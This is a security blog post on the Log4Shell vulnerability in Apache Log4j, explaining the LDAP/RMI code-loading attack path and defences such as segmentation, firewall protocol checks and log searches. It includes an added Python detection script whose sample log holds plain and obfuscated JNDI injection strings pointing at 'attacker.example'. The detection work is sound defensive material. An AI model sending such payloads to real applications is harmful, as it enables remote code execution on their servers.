log4shell (CVE-2021-44228) – what to do? – Tec-Bite IT-Security Blog
- 25 February 2026
Once again, an IT vulnerability dominates the headlines. When even regular daily newspapers write about it, the confusion usually only grows. I would like to put into perspective here how serious it really is and how one can, or could have, protected oneself.
What happened?
A Remote Code Execution (RCE) vulnerability was found in the Apache Log4j logging framework for Java. It is comparatively easy to exploit. What makes the situation so bad is how widely Log4j is used: the framework is found in thousands of software projects. An attacker only needs to send the application a string that gets logged. The logging framework interprets this string, connects to an LDAP(S) server and loads code from there.
Is it really that bad?
Basically, it is devastating that such a critical vulnerability (CVSS score 10/10) went undetected for 7 years in such a widely used framework. Unfortunately, it cannot be ruled out that state actors have known about the vulnerability for some time and have used it for attacks. The list of affected companies, including Google, Apple and Cloudflare, shows how widespread the framework is. Log4shell will probably reignite the discussion about security reviews of open-source software. To be fair, the big IT companies are already doing quite a bit, but obviously still not enough. This also raises the question of whether this should really be left to the big tech companies.
The good news is that if you have implemented basic protective measures, you are probably barely affected by log4shell. This should not be misunderstood, however: the chance that the vulnerable component exists somewhere in your network is close to 100%, so you should identify and patch the relevant systems. Implementing a few simple best practices prevents active exploitation of the vulnerability.
How can I protect myself?
It is actually quite simple. Attackers have to load their code via LDAP(S). This automatically means that if that is not possible, the vulnerability cannot be actively exploited. So those who do not expose their servers to the internet directly, or only via a proxy, can probably sleep much more peacefully. Those who expose their servers to the internet out of convenience should at least restrict the allowed protocols to HTTP(S). I really cannot think of any reason why a server should speak LDAP with the whole world. It is important that the firewall does not just have ports 80/443 open but also performs protocol detection, which ensures that a real HTTP session is running on port 80 and not LDAP.
A second attack vector runs via RMI (Remote Method Invocation), which can be used to execute code on another system. Network segmentation helps here above all. Usually there is no reason why a system reachable from the internet should be able to talk to other servers via RMI.
There are also some parameters that can be set on the affected systems to fix the problem. There is already a lot of information available online, so no more details here.
How do I identify vulnerable systems?
There are now quite good open-source scanners that search all Java libraries for vulnerable Log4j versions. Customers of a vulnerability management solution such as Tenable are better off: they had a report in their inbox right after the weekend listing all affected systems. Perhaps now is the right time to evaluate such a solution.
How do I recognize compromised systems?
Exploitation of the vulnerability is comparatively easy to detect, and there is already a lot of information available online about this as well. The easiest way is to search the logs of the affected systems. Alternatively, freely available IOC (Indicator of Compromise) lists can help.
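As an added example (not code from the original post), a small Python scanner that searches web-server log lines for the lookup strings described above that point at LDAP(S) or RMI, first collapsing the nested lookups attackers use to hide the literal "jndi" token. The log lines and the host name attacker.example are constructed for the demonstration.

```python
import re
from typing import NamedTuple

# Lookup schemes the post names as the code-loading path: LDAP(S) and RMI.
SUSPICIOUS_SCHEMES = ("ldap", "ldaps", "rmi")

# Nested lookups that hide the literal token, e.g. ${lower:j}ndi or ${::-j}ndi.
_CASE_LOOKUP = re.compile(r"\$\{\s*(?:lower|upper)\s*:\s*([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# The lookup we actually want to find once obfuscation has been removed.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*:", re.IGNORECASE)


def normalize(text: str) -> str:
    """Collapse nested case/default lookups until the text stops changing, then lowercase."""
    prev = None
    while prev != text:
        prev = text
        text = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
    return text.lower()


class Hit(NamedTuple):
    line_no: int
    scheme: str
    line: str


def scan_lines(lines, schemes=SUSPICIOUS_SCHEMES) -> list[Hit]:
    """Return one Hit per log line containing a JNDI lookup with a suspicious scheme."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = _JNDI.search(normalize(line))
        if m and m.group("scheme") in schemes:
            hits.append(Hit(n, m.group("scheme"), line.rstrip()))
    return hits


# Constructed access-log sample: one benign line, three lookup attempts, one harmless lookup.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Dec/2021:03:14:07 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [11/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"
10.0.0.9 - - [11/Dec/2021:03:14:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:r}mi://attacker.example/b}"
10.0.0.9 - - [11/Dec/2021:03:14:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}dap://attacker.example/c}"
10.0.0.7 - - [11/Dec/2021:03:14:15 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 10 "-" "curl/7.79"
"""

if __name__ == "__main__":
    for hit in scan_lines(SAMPLE_LOG.splitlines()):
        print(f"line {hit.line_no}: {hit.scheme} lookup in {hit.line}")
```

Run it against a real access log with `scan_lines(open(path).readlines())`; the scheme list is a parameter so other lookup types can be added.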
Conclusion
Clearly, log4shell is a devastating vulnerability that will affect many companies. However, those who have been following best practices can probably sleep much more peacefully than others. Nevertheless, it is advisable to quickly identify the vulnerable systems and eliminate the problem for good.